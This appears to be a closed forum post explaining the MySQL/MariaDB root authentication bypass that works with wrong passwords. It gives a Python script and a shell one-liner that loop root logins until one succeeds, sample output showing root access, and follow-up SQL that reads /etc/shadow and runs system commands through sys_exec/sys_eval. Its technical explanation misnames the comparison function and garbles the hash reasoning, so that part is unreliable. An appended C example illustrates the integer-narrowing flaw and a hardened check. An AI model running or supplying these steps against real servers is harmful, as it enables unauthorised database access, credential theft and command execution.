Thread status:
Closed
  1. .:: RSS ::. (automated account)

    Today we will look at a serious vulnerability in the MySQL and MariaDB database management systems that allows the password of the root account to be bypassed using a wrong password.


    Affected versions: 5.1.61, 5.2.11, 5.3.5, 5.5.2


    Quoted from SinaRitx on the vulnerability:

    The idea here depends on how the affected programs handle their users' passwords: each time a login is made with a password, a new token is opened and then compared with the expected password stored in the database, using the memcpy() function, which is assumed to return values only within the range -127 to 127. However, on some operating systems and with some compilers, memcpy() has a range wider than -127 to 127 and so returns larger values.

    In other words, when logging in, a specific hash is derived for the password entered in the field and then compared with the hash stored in the database; if they do not match, the login is rejected. So we need to understand, in simplified form, how the hash is derived.

    Suppose the password of the server administrator who owns the root account is 0011223344
    and that it is stored in the administrator's data with a particular encryption, say
    "2fc5ce2c16c697a9362aeade602ab166"

    Then the attacker comes along, and when he tries to log in with any other password the result is a different hash in one case only: if both passwords are under the same encryption conditions, or more precisely at the same level, with the same encryption formula of the same type and the same variables, a different hash will simply result and the password is accordingly rejected.

    What if the process is done differently in MySQL databases????
    When the way the root account's password is encrypted in MySQL databases was studied, it was found that they store the hash of the password and then compare the password used on each login. However, they do not apply the same encryption conditions in every case; more precisely, a single encryption formula is used but with different variables each time, which opens the door to many possibilities for a password match. Calculated mathematically, the probability that the resulting hash matches the hash stored in the admin's data was found to equal 1/256, when guessing against a single account, namely root.


    Now that we have explained the vulnerability and understood how it arises, we come to exploitation.
    1-remote exploit
    To exploit it we rely on Metasploit, as you can see in the following image.

    Or by means of a Python script:

    Code:
    #!/usr/bin/python
    #
    #
    # This has to be the easiest "exploit" ever. Seriously. Embarrassed to submit this a little.
    #
    # Title: MySQL Remote Root Authentication Bypass
    # Written by: Dave Kennedy (ReL1K)
    # Secmaniac has moved!
    #
    # Original advisory here: seclists.org/oss-sec/2012/q2/493
    import subprocess

    ipaddr = raw_input("Enter the IP address of the mysql server: ")

    while 1:
        subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()


    After running it, as you can see, we got into the database with the root account:
    Code:
    relik@stronghold:~# python mysql_bypass.py
    ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
    [... the same "Access denied" line repeats for each further failed attempt ...]
    ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Welcome to the MySQL monitor. Commands end with ; or \g.
    Your MySQL connection id is 24598
    Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

    Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    owners.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    mysql>


    2-local exploit

    To exploit it we run this command:
    Code:
    for i in `seq 1 512`; do echo 'select @@version;' | mysql -h 127.0.0.1 -u root mysql --password=X 2>/dev/null && break; done


    After that you will find yourself inside the database as the root user, like this:
    Code:
    Welcome to the MySQL monitor. Commands end with ; or \g.
    Your MySQL connection id is 24598
    Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

    Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    owners.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    mysql>


    And here is a video explaining the process:
    http://www.youtube.com/watch?v=B_3Bp...eature=related

    The question some will ask: what comes after getting in?

    Well, brother, after getting in you can read files such as shadow, for example:
    Code:
    select load_file('/etc/shadow');


    Or execute commands by means of sys_exec or sys_eval, for example:
    Code:
    select sys_exec("cat /etc/passwd");


    Code:
    mysql> SELECT sys_eval('id');
    +--------------------------------------------------+
    | sys_eval('id') |
    +--------------------------------------------------+
    | Linux localhost.localdomain 2.6.32-220.2.1.el6.x86_64 #1 SMP Fri Dec 23 02:21:33 CST 2011 x86_64 |
    +--------------------------------------------------+
    1 row in set (0.02 sec)


    I hope the lesson is clear.
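
The narrowing flaw behind the 1/256 figure in the quoted explanation, as an added C example (not code from the original post or from MySQL/MariaDB): a comparison result wider than 8 bits is stored in an 8-bit value, so a non-zero "mismatch" can turn into 0 and read as a match. The names `bool8` and `wide_memcmp` and the sample digests are constructed assumptions; `wide_memcmp` stands in for an optimised comparison routine that returns word differences.

```c
#include <stdio.h>
#include <stddef.h>

/* Assumed 8-bit boolean type; it can hold only -128..127. */
typedef signed char bool8;

/* Vulnerable pattern: int comparison result narrowed to 8 bits (0 = match).
   Non-zero results whose low byte is 0 (256, -512, ...) become 0.
   The out-of-range conversion wraps modulo 256 on gcc and clang. */
static bool8 mismatch_truncating(int cmp_result) { return (bool8)cmp_result; }

/* Hardened pattern: reduce the result to 0/1 before narrowing. */
static bool8 mismatch_normalised(int cmp_result) { return (bool8)(cmp_result != 0); }

/* Constructed stand-in for an optimised comparison routine: compares
   16-bit big-endian words and returns their difference. The C standard
   fixes only the sign of such a result, not its magnitude. */
static int wide_memcmp(const unsigned char *a, const unsigned char *b, size_t n)
{
    size_t i;
    for (i = 0; i + 1 < n; i += 2) {
        int wa = (a[i] << 8) | a[i + 1];
        int wb = (b[i] << 8) | b[i + 1];
        if (wa != wb)
            return wa - wb;
    }
    return (i < n) ? a[i] - b[i] : 0;   /* odd trailing byte */
}

/* Login decision built on each pattern: 1 = accepted, 0 = rejected. */
static int accepts_truncating(const unsigned char *s, const unsigned char *g, size_t n)
{ return mismatch_truncating(wide_memcmp(s, g, n)) == 0; }

static int accepts_normalised(const unsigned char *s, const unsigned char *g, size_t n)
{ return mismatch_normalised(wide_memcmp(s, g, n)) == 0; }

/* Count non-zero comparison results in [-limit, limit] that a checker
   reports as a match. */
static long false_accepts(bool8 (*check)(int), int limit)
{
    long n = 0;
    for (int r = -limit; r <= limit; r++)
        if (r != 0 && check(r) == 0)
            n++;
    return n;
}

/* Constructed sample digests (4 bytes each). */
static const unsigned char STORED[4]   = {0x2f, 0xc5, 0xce, 0x2c};
static const unsigned char WRONG_HI[4] = {0x30, 0xc5, 0xce, 0x2c}; /* differs by -256 */
static const unsigned char WRONG_LO[4] = {0x2f, 0xc6, 0xce, 0x2c}; /* differs by -1   */

int main(void)
{
    printf("truncating: %ld of %d non-zero results read as a match\n",
           false_accepts(mismatch_truncating, 65536), 2 * 65536);
    printf("normalised: %ld of %d non-zero results read as a match\n",
           false_accepts(mismatch_normalised, 65536), 2 * 65536);
    printf("wrong digest (diff -256): truncating=%d normalised=%d\n",
           accepts_truncating(STORED, WRONG_HI, 4),
           accepts_normalised(STORED, WRONG_HI, 4));
    printf("wrong digest (diff -1):   truncating=%d normalised=%d\n",
           accepts_truncating(STORED, WRONG_LO, 4),
           accepts_normalised(STORED, WRONG_LO, 4));
    return 0;
}
```

With the truncating check, 512 of the 131072 non-zero results in the tested range collapse to 0, which is the 1/256 ratio quoted above; the normalised check accepts none of them.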